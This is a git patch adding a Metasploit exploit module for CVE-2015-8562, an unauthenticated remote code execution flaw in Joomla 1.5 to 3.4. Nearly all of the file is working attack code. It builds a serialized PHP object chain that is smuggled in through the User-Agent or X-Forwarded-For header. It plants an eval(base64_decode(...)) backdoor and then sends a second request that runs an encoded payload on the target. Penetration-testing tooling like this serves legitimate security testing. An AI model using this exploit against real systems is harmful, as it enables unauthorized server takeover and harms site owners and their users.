From 84d5067abed9f44833696be30a3ac1c9e356e486 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 15 Dec 2015 17:20:49 +0100 Subject: [PATCH] add joomla RCE module --- .../multi/http/joomla_user_agent_rce.rb | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/exploits/multi/http/joomla_user_agent_rce.rb diff --git a/modules/exploits/multi/http/joomla_user_agent_rce.rb b/modules/exploits/multi/http/joomla_user_agent_rce.rb new file mode 100644 index 0000000000..6d621faf21 --- /dev/null +++ b/modules/exploits/multi/http/joomla_user_agent_rce.rb @@ -0,0 +1,78 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution', + 'Description' => %q{ + Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5 to 3.4. + By storing user supplied headers in the databases session table it's possible to truncate the input + by sending an UTF-8 character. The custom created payload is then executed once the session is read + from the databse + }, + 'Author' => + [ + 'Marc-Alexandre Montpas', # discovery + 'Christian Mehlmauer' # metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2015-8562'], + ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'], + ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'], + ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'], + ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'], + ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Joomla', {}]], + 'DisclosureDate' => 'Dec 14 2015', + 'DefaultTarget' => 0) + ) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]), + OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]]) + ], self.class) + end + + def get_payload + pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|" + middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";' + pay = "eval(base64_decode($_SERVER['HTTP_CMD']));JFactory::getConfig();exit;" + middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}' + post = "\xF0\x9D\x8C\x86" + return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}" + end + + def exploit + print_status("Sending payload ...") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => target_uri.to_s, + 'headers' => { datastore['HEADER'] => get_payload } + }) + session_cookie = res.get_cookies + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => target_uri.to_s, + 'cookie' => session_cookie, + 'headers' => { + 'CMD' => Rex::Text.encode_base64(payload.encoded) + } + }) + end +end